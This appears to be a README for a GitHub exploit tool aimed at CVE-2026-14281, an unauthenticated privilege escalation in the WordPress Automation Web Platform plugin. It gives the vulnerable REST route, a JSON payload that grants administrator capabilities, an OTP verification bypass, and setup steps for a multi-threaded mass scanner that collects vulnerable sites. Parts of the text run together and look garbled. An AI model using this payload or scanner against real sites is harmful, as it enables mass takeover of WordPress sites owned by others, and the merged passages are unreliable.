针对 CVE-2026-14281 的批量扫描器 + 单目标利用工具 —— WordPress Automation Web Platform (WAWP) 插件
<= 4.8.6中的未认证权限提升漏洞。
WordPress 插件 Automation Web Platform(由 101gen 开发)中存在权限管理不当漏洞(CWE-269)。受影响版本为 <= 4.8.6。
| 字段 | 值 |
|---|---|
| CVE | CVE-2026-14281 |
| 类型 | 未认证权限提升 |
| CVSS | 9.8(严重) |
| 认证 | 无需认证 |
| 受影响 | WAWP 插件 <= 4.8.6 |
该插件暴露了一个公开的 REST 路由:
POST /wp-json/wawp/v1/signup/<op>
没有权限检查。处理程序将攻击者可控的 wawp_custom_fields 复制到 update_user_meta() —— 没有允许列表。攻击者设置:
{
"wawp_custom_fields": {
"wp_capabilities": {"administrator": true},
"wp_user_level": "10"
}
}
结果:新账户获得 administrator 角色。
OTP 令牌(otp_transient)以明文形式返回在响应体中。使用该令牌发起 GET 请求会将其标记为已验证 —— 无需电子邮件/短信。
/wp-json/wawp/v1/signup/,包含 wp_capabilities: administrator/wp-login.php 登录/wp-admin/users.php 确认3.7+requests、urllib3git clone https://github.com/yourname/langz-scanner.git
cd langz-scanner
pip install requests urllib3
python3 CVE-2026-14281.py
[1] Mass Scan -> detect many targets, save vuln to txt
[2] Verify Single -> exploit + confirm + auto cleanup
[0] Exit
批量扫描: 输入目标列表文件、输出文件(默认 vuln.txt)、线程数(默认 20)。
验证单个: 输入 YA,输入目标 URL。工具会创建一个临时管理员,验证后清理。
vuln.txt 包含仅确认存在漏洞的 URL,每行一个:
http://target1.com
https://target2.org
4.8.6 以上版本/wp-json/wawp/v1/signup/For AUTHORIZED SECURITY TESTING only.
Do not use against systems you don't own or have permission to test.
The developer assumes no responsibility for misuse.
明智地使用它。知识是用来保护的,而不是用来破坏的。